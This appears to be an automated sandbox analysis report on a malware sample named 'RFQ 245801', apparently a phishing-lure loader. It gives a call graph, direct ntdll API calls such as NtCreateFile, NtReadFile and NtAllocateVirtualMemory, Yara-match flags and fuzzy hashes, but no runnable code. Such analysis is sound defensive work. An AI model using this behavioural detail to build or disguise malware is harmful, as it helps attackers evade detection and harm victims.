97351 40f1bb 97350->97351 97743 41a1b0 97350->97743 97353 409d65 97351->97353 97735 41a7a0 97351->97735 97353->97276 97355 40f1d2 97358 40f1fd 97355->97358 97738 41a230 97355->97738 97356 41a460 2 API calls 97356->97353 97358->97356 97381 41a5d0 97359->97381 97363 41b299 97362->97363 97394 414a50 97363->97394 97365 41b2b1 97366 41b2ba 97365->97366 97433 41b0c0 97365->97433 97366->97335 97368 41b2ce 97368->97366 97451 419ed0 97368->97451 97701 407ea0 97373->97701 97375 409ad1 97375->97337 97376 409aca 97376->97375 97714 408160 97376->97714 97379->97329 97380->97339 97384 41af30 97381->97384 97383 418a55 97383->97333 97385 41af40 97384->97385 97386 41af62 97384->97386 97388 414e50 97385->97388 97386->97383 97389 414e5e 97388->97389 97390 414e6a 97388->97390 97389->97390 97393 4152d0 LdrLoadDll 97389->97393 97390->97386 97392 414fbc 97392->97386 97393->97392 97395 414d85 97394->97395 97396 414a64 97394->97396 97395->97365 97396->97395 97459 419c20 97396->97459 97399 414b90 97462 41a330 97399->97462 97400 414b73 97519 41a430 LdrLoadDll 97400->97519 97403 414b7d 97403->97365 97404 414bb7 97405 41bd90 2 API calls 97404->97405 97407 414bc3 97405->97407 97406 414d49 97409 41a460 2 API calls 97406->97409 97407->97403 97407->97406 97408 414d5f 97407->97408 97413 414c52 97407->97413 97528 414790 LdrLoadDll NtReadFile NtClose 97408->97528 97410 414d50 97409->97410 97410->97365 97412 414d72 97412->97365 97414 414cb9 97413->97414 97416 414c61 97413->97416 97414->97406 97415 414ccc 97414->97415 97521 41a2b0 97415->97521 97418 414c66 97416->97418 97419 414c7a 97416->97419 97520 414650 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 97418->97520 97422 414c97 97419->97422 97423 414c7f 97419->97423 97422->97410 97477 414410 97422->97477 97465 4146f0 97423->97465 97425 414c70 97425->97365 97427 414d2c 97525 41a460 97427->97525 97428 414c8d 97428->97365 97431 414caf 97431->97365 97432 414d38 97432->97365 97434 41b0d1 97433->97434 97435 41b0e3 97434->97435 97546 41bd10 
97434->97546 97435->97368 97437 41b104 97549 414070 97437->97549 97439 41b150 97439->97368 97440 41b127 97440->97439 97441 414070 3 API calls 97440->97441 97442 41b149 97441->97442 97442->97439 97574 415390 97442->97574 97444 41b1ea 97584 41ad40 97444->97584 97445 41b1da 97445->97444 97668 41aed0 LdrLoadDll 97445->97668 97448 41b218 97663 419e90 97448->97663 97452 419eec 97451->97452 97453 41af30 LdrLoadDll 97451->97453 97695 1762c0a 97452->97695 97453->97452 97454 419f07 97456 41bd90 97454->97456 97698 41a640 97456->97698 97458 41b329 97458->97335 97460 41af30 LdrLoadDll 97459->97460 97461 414b44 97460->97461 97461->97399 97461->97400 97461->97403 97463 41a34c NtCreateFile 97462->97463 97464 41af30 LdrLoadDll 97462->97464 97463->97404 97464->97463 97466 41470c 97465->97466 97467 41a2b0 LdrLoadDll 97466->97467 97468 41472d 97467->97468 97469 414734 97468->97469 97470 414748 97468->97470 97472 41a460 2 API calls 97469->97472 97471 41a460 2 API calls 97470->97471 97473 414751 97471->97473 97474 41473d 97472->97474 97529 41bfa0 LdrLoadDll RtlAllocateHeap 97473->97529 97474->97428 97476 41475c 97476->97428 97478 41445b 97477->97478 97479 41448e 97477->97479 97480 41a2b0 LdrLoadDll 97478->97480 97481 4145d9 97479->97481 97484 4144aa 97479->97484 97482 414476 97480->97482 97483 41a2b0 LdrLoadDll 97481->97483 97485 41a460 2 API calls 97482->97485 97489 4145f4 97483->97489 97486 41a2b0 LdrLoadDll 97484->97486 97487 41447f 97485->97487 97488 4144c5 97486->97488 97487->97431 97491 4144e1 97488->97491 97492 4144cc 97488->97492 97542 41a2f0 LdrLoadDll 97489->97542 97495 4144e6 97491->97495 97496 4144fc 97491->97496 97494 41a460 2 API calls 97492->97494 97493 41462e 97497 41a460 2 API calls 97493->97497 97498 4144d5 97494->97498 97499 41a460 2 API calls 97495->97499 97505 414501 97496->97505 97530 41bf60 97496->97530 97500 414639 97497->97500 97498->97431 97501 4144ef 97499->97501 97500->97431 97501->97431 97502 414513 97502->97431 97505->97502 97533 41a3e0 97505->97533 97506 
414567 97507 41457e 97506->97507 97541 41a270 LdrLoadDll 97506->97541 97509 414585 97507->97509 97510 41459a 97507->97510 97512 41a460 2 API calls 97509->97512 97511 41a460 2 API calls 97510->97511 97513 4145a3 97511->97513 97512->97502 97514 4145cf 97513->97514 97536 41bb60 97513->97536 97514->97431 97516 4145ba 97517 41bd90 2 API calls 97516->97517 97518 4145c3 97517->97518 97518->97431 97519->97403 97520->97425 97522 41af30 LdrLoadDll 97521->97522 97523 414d14 97522->97523 97524 41a2f0 LdrLoadDll 97523->97524 97524->97427 97526 41a47c NtClose 97525->97526 97527 41af30 LdrLoadDll 97525->97527 97526->97432 97527->97526 97528->97412 97529->97476 97543 41a600 97530->97543 97532 41bf78 97532->97505 97534 41a3fc NtReadFile 97533->97534 97535 41af30 LdrLoadDll 97533->97535 97534->97506 97535->97534 97537 41bb84 97536->97537 97538 41bb6d 97536->97538 97537->97516 97538->97537 97539 41bf60 2 API calls 97538->97539 97540 41bb9b 97539->97540 97540->97516 97541->97507 97542->97493 97544 41af30 LdrLoadDll 97543->97544 97545 41a61c RtlAllocateHeap 97544->97545 97545->97532 97547 41bd3d 97546->97547 97669 41a510 97546->97669 97547->97437 97550 414081 97549->97550 97551 414089 97549->97551 97550->97440 97573 41435c 97551->97573 97672 41cf00 97551->97672 97553 4140dd 97554 41cf00 2 API calls 97553->97554 97557 4140e8 97554->97557 97555 414136 97558 41cf00 2 API calls 97555->97558 97557->97555 97677 41cfa0 97557->97677 97559 41414a 97558->97559 97560 41cf00 2 API calls 97559->97560 97562 4141bd 97560->97562 97561 41cf00 2 API calls 97570 414205 97561->97570 97562->97561 97564 414334 97684 41cf60 LdrLoadDll RtlFreeHeap 97564->97684 97566 41433e 97685 41cf60 LdrLoadDll RtlFreeHeap 97566->97685 97568 414348 97686 41cf60 LdrLoadDll RtlFreeHeap 97568->97686 97683 41cf60 LdrLoadDll RtlFreeHeap 97570->97683 97571 414352 97687 41cf60 LdrLoadDll RtlFreeHeap 97571->97687 97573->97440 97575 4153a1 97574->97575 97576 414a50 8 API calls 97575->97576 97577 4153b7 97576->97577 97578 4153f2 
97577->97578 97579 415405 97577->97579 97583 41540a 97577->97583 97580 41bd90 2 API calls 97578->97580 97581 41bd90 2 API calls 97579->97581 97582 4153f7 97580->97582 97581->97583 97582->97445 97583->97445 97688 41ac00 97584->97688 97587 41ac00 LdrLoadDll 97588 41ad5d 97587->97588 97589 41ac00 LdrLoadDll 97588->97589 97590 41ad66 97589->97590 97591 41ac00 LdrLoadDll 97590->97591 97592 41ad6f 97591->97592 97593 41ac00 LdrLoadDll 97592->97593 97594 41ad78 97593->97594 97595 41ac00 LdrLoadDll 97594->97595 97596 41ad81 97595->97596 97597 41ac00 LdrLoadDll 97596->97597 97598 41ad8d 97597->97598 97599 41ac00 LdrLoadDll 97598->97599 97600 41ad96 97599->97600 97601 41ac00 LdrLoadDll 97600->97601 97602 41ad9f 97601->97602 97603 41ac00 LdrLoadDll 97602->97603 97604 41ada8 97603->97604 97605 41ac00 LdrLoadDll 97604->97605 97606 41adb1 97605->97606 97607 41ac00 LdrLoadDll 97606->97607 97608 41adba 97607->97608 97609 41ac00 LdrLoadDll 97608->97609 97610 41adc6 97609->97610 97611 41ac00 LdrLoadDll 97610->97611 97612 41adcf 97611->97612 97613 41ac00 LdrLoadDll 97612->97613 97614 41add8 97613->97614 97615 41ac00 LdrLoadDll 97614->97615 97616 41ade1 97615->97616 97617 41ac00 LdrLoadDll 97616->97617 97618 41adea 97617->97618 97619 41ac00 LdrLoadDll 97618->97619 97620 41adf3 97619->97620 97621 41ac00 LdrLoadDll 97620->97621 97622 41adff 97621->97622 97623 41ac00 LdrLoadDll 97622->97623 97624 41ae08 97623->97624 97625 41ac00 LdrLoadDll 97624->97625 97626 41ae11 97625->97626 97627 41ac00 LdrLoadDll 97626->97627 97628 41ae1a 97627->97628 97629 41ac00 LdrLoadDll 97628->97629 97630 41ae23 97629->97630 97631 41ac00 LdrLoadDll 97630->97631 97632 41ae2c 97631->97632 97633 41ac00 LdrLoadDll 97632->97633 97634 41ae38 97633->97634 97635 41ac00 LdrLoadDll 97634->97635 97636 41ae41 97635->97636 97637 41ac00 LdrLoadDll 97636->97637 97638 41ae4a 97637->97638 97639 41ac00 LdrLoadDll 97638->97639 97640 41ae53 97639->97640 97641 41ac00 LdrLoadDll 97640->97641 97642 41ae5c 97641->97642 97643 41ac00 
LdrLoadDll 97642->97643 97644 41ae65 97643->97644 97645 41ac00 LdrLoadDll 97644->97645 97646 41ae71 97645->97646 97647 41ac00 LdrLoadDll 97646->97647 97648 41ae7a 97647->97648 97649 41ac00 LdrLoadDll 97648->97649 97650 41ae83 97649->97650 97651 41ac00 LdrLoadDll 97650->97651 97652 41ae8c 97651->97652 97653 41ac00 LdrLoadDll 97652->97653 97654 41ae95 97653->97654 97655 41ac00 LdrLoadDll 97654->97655 97656 41ae9e 97655->97656 97657 41ac00 LdrLoadDll 97656->97657 97658 41aeaa 97657->97658 97659 41ac00 LdrLoadDll 97658->97659 97660 41aeb3 97659->97660 97661 41ac00 LdrLoadDll 97660->97661 97662 41aebc 97661->97662 97662->97448 97664 41af30 LdrLoadDll 97663->97664 97665 419eac 97664->97665 97694 1762df0 LdrInitializeThunk 97665->97694 97666 419ec3 97666->97368 97668->97444 97670 41a52c NtAllocateVirtualMemory 97669->97670 97671 41af30 LdrLoadDll 97669->97671 97670->97547 97671->97670 97673 41cf10 97672->97673 97674 41cf16 97672->97674 97673->97553 97675 41bf60 2 API calls 97674->97675 97676 41cf3c 97675->97676 97676->97553 97678 41cfc5 97677->97678 97681 41cffd 97677->97681 97679 41bf60 2 API calls 97678->97679 97680 41cfda 97679->97680 97682 41bd90 2 API calls 97680->97682 97681->97557 97682->97681 97683->97564 97684->97566 97685->97568 97686->97571 97687->97573 97689 41ac1b 97688->97689 97690 414e50 LdrLoadDll 97689->97690 97691 41ac3b 97690->97691 97692 414e50 LdrLoadDll 97691->97692 97693 41ace7 97691->97693 97692->97693 97693->97587 97694->97666 97696 1762c11 97695->97696 97697 1762c1f LdrInitializeThunk 97695->97697 97696->97454 97697->97454 97699 41af30 LdrLoadDll 97698->97699 97700 41a65c RtlFreeHeap 97699->97700 97700->97458 97702 407eb0 97701->97702 97703 407eab 97701->97703 97704 41bd10 2 API calls 97702->97704 97703->97376 97707 407ed5 97704->97707 97705 407f38 97705->97376 97706 419e90 2 API calls 97706->97707 97707->97705 97707->97706 97708 407f3e 97707->97708 97712 41bd10 2 API calls 97707->97712 97717 41a590 97707->97717 97710 407f64 97708->97710 97711 
41a590 2 API calls 97708->97711 97710->97376 97713 407f55 97711->97713 97712->97707 97713->97376 97715 40817e 97714->97715 97716 41a590 2 API calls 97714->97716 97715->97337 97716->97715 97718 41af30 LdrLoadDll 97717->97718 97719 41a5ac 97718->97719 97719->97707 97720 41a5cc 97719->97720 97722 1762c70 LdrInitializeThunk 97719->97722 97722->97719 97724 41b593 97723->97724 97727 40acf0 97724->97727 97728 40ad14 97727->97728 97729 409c5b 97728->97729 97730 40ad5d LdrLoadDll 97728->97730 97729->97345 97730->97729 97732 40b063 97731->97732 97732->97732 97734 40b0e0 97732->97734 97746 419c60 LdrLoadDll 97732->97746 97734->97350 97736 41af30 LdrLoadDll 97735->97736 97737 41a7bf LookupPrivilegeValueW 97736->97737 97737->97355 97739 41af30 LdrLoadDll 97738->97739 97740 41a24c 97739->97740 97747 1762ea0 LdrInitializeThunk 97740->97747 97741 41a26b 97741->97358 97744 41af30 LdrLoadDll 97743->97744 97745 41a1cc 97744->97745 97745->97351 97746->97734 97747->97741 97749 40b1f0 97748->97749 97750 40b040 LdrLoadDll 97749->97750 97751 40b204 97750->97751 97751->97292 97753 40ae51 97752->97753 97754 40ae4d 97752->97754 97755 40ae6a 97753->97755 97756 40ae9c 97753->97756 97754->97295 97798 419ca0 LdrLoadDll 97755->97798 97799 419ca0 LdrLoadDll 97756->97799 97758 40aead 97758->97295 97760 40ae8c 97760->97295 97762 40f4a0 3 API calls 97761->97762 97763 4143c6 97761->97763 97762->97763 97763->97297 97765 408a79 97764->97765 97800 4087a0 97764->97800 97767 4087a0 19 API calls 97765->97767 97770 408a9d 97765->97770 97768 408a8a 97767->97768 97768->97770 97818 40f710 10 API calls 97768->97818 97770->97299 97772 41af30 LdrLoadDll 97771->97772 97773 41a4ec 97772->97773 97937 1762e80 LdrInitializeThunk 97773->97937 97774 40c322 97776 40f4a0 97774->97776 97777 40f4bd 97776->97777 97938 419f90 97777->97938 97780 40f505 97780->97303 97781 419fe0 2 API calls 97782 40f52e 97781->97782 97782->97303 97784 419ffc 97783->97784 97785 41af30 LdrLoadDll 97783->97785 97945 1762d10 LdrInitializeThunk 
97784->97945 97785->97784 97786 40c385 97786->97309 97786->97312 97789 41af30 LdrLoadDll 97788->97789 97790 41a04c 97789->97790 97946 1762d30 LdrInitializeThunk 97790->97946 97791 40c459 97791->97320 97794 41af30 LdrLoadDll 97793->97794 97795 419e0c 97794->97795 97947 1762fb0 LdrInitializeThunk 97795->97947 97796 40c4ac 97796->97324 97798->97760 97799->97758 97801 407ea0 4 API calls 97800->97801 97804 4087ba 97800->97804 97801->97804 97802 408a49 97802->97765 97803 408a3f 97805 408160 2 API calls 97803->97805 97804->97802 97804->97803 97808 419ed0 2 API calls 97804->97808 97812 40c4c0 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 97804->97812 97815 419df0 2 API calls 97804->97815 97816 41a460 LdrLoadDll NtClose 97804->97816 97819 419ce0 97804->97819 97822 4085d0 97804->97822 97834 40f5f0 LdrLoadDll NtClose 97804->97834 97835 419d60 LdrLoadDll 97804->97835 97836 419d90 LdrLoadDll 97804->97836 97837 419e20 LdrLoadDll 97804->97837 97838 4083a0 97804->97838 97854 405f60 LdrLoadDll 97804->97854 97805->97802 97808->97804 97812->97804 97815->97804 97816->97804 97818->97770 97820 41af30 LdrLoadDll 97819->97820 97821 419cfc 97820->97821 97821->97804 97823 4085e6 97822->97823 97855 419850 97823->97855 97825 4085ff 97826 408771 97825->97826 97876 4081a0 97825->97876 97826->97804 97828 4086e5 97828->97826 97829 4083a0 11 API calls 97828->97829 97830 408713 97829->97830 97830->97826 97831 419ed0 2 API calls 97830->97831 97832 408748 97831->97832 97832->97826 97833 41a4d0 2 API calls 97832->97833 97833->97826 97834->97804 97835->97804 97836->97804 97837->97804 97839 4083c9 97838->97839 97916 408310 97839->97916 97842 41a4d0 2 API calls 97843 4083dc 97842->97843 97843->97842 97844 408467 97843->97844 97847 408462 97843->97847 97924 40f670 97843->97924 97844->97804 97845 41a460 2 API calls 97846 40849a 97845->97846 97846->97844 97848 419ce0 LdrLoadDll 97846->97848 97847->97845 97849 4084ff 97848->97849 97849->97844 97928 419d20 97849->97928 97851 
408563 97851->97844 97852 414a50 8 API calls 97851->97852 97853 4085b8 97852->97853 97853->97804 97854->97804 97856 41bf60 2 API calls 97855->97856 97857 419867 97856->97857 97883 409310 97857->97883 97859 419882 97860 4198c0 97859->97860 97861 4198a9 97859->97861 97864 41bd10 2 API calls 97860->97864 97862 41bd90 2 API calls 97861->97862 97863 4198b6 97862->97863 97863->97825 97865 4198fa 97864->97865 97866 41bd10 2 API calls 97865->97866 97867 419913 97866->97867 97873 419bb4 97867->97873 97889 41bd50 97867->97889 97870 419ba0 97871 41bd90 2 API calls 97870->97871 97872 419baa 97871->97872 97872->97825 97874 41bd90 2 API calls 97873->97874 97875 419c09 97874->97875 97875->97825 97877 40829f 97876->97877 97878 4081b5 97876->97878 97877->97828 97878->97877 97879 414a50 8 API calls 97878->97879 97881 408222 97879->97881 97880 408249 97880->97828 97881->97880 97882 41bd90 2 API calls 97881->97882 97882->97880 97884 409335 97883->97884 97885 40acf0 LdrLoadDll 97884->97885 97886 409368 97885->97886 97887 40938d 97886->97887 97892 40cf20 97886->97892 97887->97859 97910 41a550 97889->97910 97893 40cf4c 97892->97893 97894 41a1b0 LdrLoadDll 97893->97894 97895 40cf65 97894->97895 97896 40cf6c 97895->97896 97903 41a1f0 97895->97903 97896->97887 97900 40cfa7 97901 41a460 2 API calls 97900->97901 97902 40cfca 97901->97902 97902->97887 97904 41a20c 97903->97904 97905 41af30 LdrLoadDll 97903->97905 97909 1762ca0 LdrInitializeThunk 97904->97909 97905->97904 97906 40cf8f 97906->97896 97908 41a7e0 LdrLoadDll 97906->97908 97908->97900 97909->97906 97911 41af30 LdrLoadDll 97910->97911 97912 41a56c 97911->97912 97915 1762f90 LdrInitializeThunk 97912->97915 97913 419b99 97913->97870 97913->97873 97915->97913 97917 408328 97916->97917 97918 40acf0 LdrLoadDll 97917->97918 97919 408343 97918->97919 97920 414e50 LdrLoadDll 97919->97920 97921 408353 97920->97921 97922 40835c PostThreadMessageW 97921->97922 97923 408370 97921->97923 97922->97923 97923->97843 97925 40f683 97924->97925 97931 
419e60 97925->97931 97929 41af30 LdrLoadDll 97928->97929 97930 419d3c 97929->97930 97930->97851 97932 419e7c 97931->97932 97933 41af30 LdrLoadDll 97931->97933 97936 1762dd0 LdrInitializeThunk 97932->97936 97933->97932 97934 40f6ae 97934->97843 97936->97934 97937->97774 97939 419fa6 97938->97939 97940 41af30 LdrLoadDll 97939->97940 97941 419fac 97940->97941 97944 1762f30 LdrInitializeThunk 97941->97944 97942 40f4fe 97942->97780 97942->97781 97944->97942 97945->97786 97946->97791 97947->97796 97951 1762ad0 LdrInitializeThunk

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 0 41a3da-41a429 call 41af30 NtReadFile
APIs
• NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A425
Strings
Memory Dump Source
• Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
Yara matches
Similarity
• API ID: FileRead
• String ID: 1JA$rMA$rMA
• API String ID: 2738559852-782607585
• Opcode ID: 757b6e1bc07b3bf09793faee9661551754b0ff6aec0333777d77dda8410c520e
• Instruction ID: d9496cab67eccaa2a300e7c2e8500b7217d72c9056333dd282b08d57620d7ac6
• Opcode Fuzzy Hash: 757b6e1bc07b3bf09793faee9661551754b0ff6aec0333777d77dda8410c520e
• Instruction Fuzzy Hash: 87F01DB2210148ABCB05DF98D890CEB7BADAF8C314B15869DFD0C97216C634E855CBA0

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 3 41a3e0-41a3f6 4 41a3fc-41a429 NtReadFile 3->4 5 41a3f7 call 41af30 3->5 5->4
APIs
• NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A425
Strings
Memory Dump Source
• Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
Yara matches
Similarity
• API ID: FileRead
• String ID: 1JA$rMA$rMA
• API String ID: 2738559852-782607585
• Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
• Instruction ID: c75c44bd16ed9a046d03b4490adc68ebadf214b0f3589fd2ba36fb57c0fad8bd
• Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
• Instruction Fuzzy Hash: 95F0B7B2210208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 204 41a2ea-41a2ee 205 41a2f0-41a329 call 41af30 204->205 206 41a338-41a381 call 41af30 NtCreateFile 204->206
APIs
• NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A37D
Memory Dump Source
• Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 94b546fadc3172d4cbd0974d002435d2c170b5460e604780f875a3b40548b332
• Instruction ID: 7d927b91c53d99ff772232a7bee72b09811667c0becba63b72a30f99829caa9b
• Opcode Fuzzy Hash: 94b546fadc3172d4cbd0974d002435d2c170b5460e604780f875a3b40548b332
• Instruction Fuzzy Hash: DE1107B2215209ABCB08DF98DC85DEB77ADAF8C314F05824DFA4DA7241C630E851CBA4

Control-flow Graph (legend: Executed / Not Executed)
• Blocks: 227 40acf0-40ad0c; 228 40ad14-40ad19; 229 40ad0f call 41cc20; 230 40ad1b-40ad1e; 231 40ad1f-40ad2d call 41d040; 234 40ad3d-40ad4e call 41b470; 235 40ad2f-40ad3a call 41d2c0; 240 40ad50-40ad64 LdrLoadDll; 241 40ad67-40ad6a
• Edges: 227->228; 227->229; 228->230; 228->231; 229->228; 231->234; 231->235; 234->240; 234->241; 235->234; 240->241
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Load
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2234796835-0
                                                                                                                                                                                  • Opcode ID: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                                                                                                  • Instruction ID: 667dcf47c4413345b20473d406be44d3d8b7ebea9a3b2269cd40777f9644ce6e
                                                                                                                                                                                  • Opcode Fuzzy Hash: 343ab67df369899ddd45e960eb1e1cf1cc0407856a101373337c9296a528243f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 79015EB5D0020DBBDB10EBA1DC42FDEB3799F54308F0045AAA908A7281F638EB54CB95

Control-flow Graph (legend: Executed / Not Executed)
• Blocks: 251 41a32a-41a346; 252 41a34c-41a381 NtCreateFile; 253 41a347 call 41af30
• Edges: 251->252; 251->253; 253->252
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A37D
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                  • Opcode ID: ee3695a4899577ce3d874c1ef7f2278fb65b84fc6352f54c306a385979961bef
                                                                                                                                                                                  • Instruction ID: 24e128ae343006bbbc751a00b5729f9aa9b5416c578219d56ac147f4e2306034
                                                                                                                                                                                  • Opcode Fuzzy Hash: ee3695a4899577ce3d874c1ef7f2278fb65b84fc6352f54c306a385979961bef
                                                                                                                                                                                  • Instruction Fuzzy Hash: 4201B2B2251208AFCB08CF88DC95EEB77ADAF8C754F558248FA1D97245D630E851CBA4

Control-flow Graph (legend: Executed / Not Executed)
• Blocks: 254 41a330-41a346; 255 41a34c-41a381 NtCreateFile; 256 41a347 call 41af30
• Edges: 254->255; 254->256; 256->255
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A37D
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: CreateFile
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 823142352-0
                                                                                                                                                                                  • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                                                  • Instruction ID: 7ed6e6cb708c972561b0f9910f559a39af1ab3cc862b6eef20835abd22e26781
                                                                                                                                                                                  • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                                                                                                                                                  • Instruction Fuzzy Hash: C4F0BDB2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E851CBA4

Control-flow Graph (legend: Executed / Not Executed)
• Blocks: 257 41a50a-41a54d call 41af30 NtAllocateVirtualMemory
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B104,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A549
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2167126740-0
                                                                                                                                                                                  • Opcode ID: 78230f0ff9201d4745c2d2b452e3fe21bc602f113a9ce9da4f9caed57fd84e58
                                                                                                                                                                                  • Instruction ID: 3214efd615eb7748cce34c0857b00ece96d2b0a482458fe4319a666bc9c2efb0
                                                                                                                                                                                  • Opcode Fuzzy Hash: 78230f0ff9201d4745c2d2b452e3fe21bc602f113a9ce9da4f9caed57fd84e58
                                                                                                                                                                                  • Instruction Fuzzy Hash: CBF05EB6210104AFDB14CF88CC80EE77B69AF8C314F158549FE489B241C230E811CFA0

Control-flow Graph (legend: Executed / Not Executed)
• Blocks: 260 41a510-41a526; 261 41a52c-41a54d NtAllocateVirtualMemory; 262 41a527 call 41af30
• Edges: 260->261; 260->262; 262->261
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B104,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A549
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AllocateMemoryVirtual
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 2167126740-0
                                                                                                                                                                                  • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                                  • Instruction ID: 8b47746d7073478515a2f8fd1fb94e42dcc9ffa91ac9ff965dae3841ed3a313c
                                                                                                                                                                                  • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9CF015B2210208ABCB14DF89CC81EEB77ADAF88754F118149BE0897241C630F811CBA4
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A485
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 00000005.00000002.1799223243.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_400000_RFQ 245801.jbxd
                                                                                                                                                                                  Yara matches
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Close
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3535843008-0
                                                                                                                                                                                  • Opcode ID: 25e6b8735553a4378f13bb0ccfcbc3dfc71a3b5083118c10cb058ef1580ccd1c
                                                                                                                                                                                  • Instruction ID: 5c9da78348f1c9ef571b357f18b9320631ab7668477cfade35412350ce0ea39f
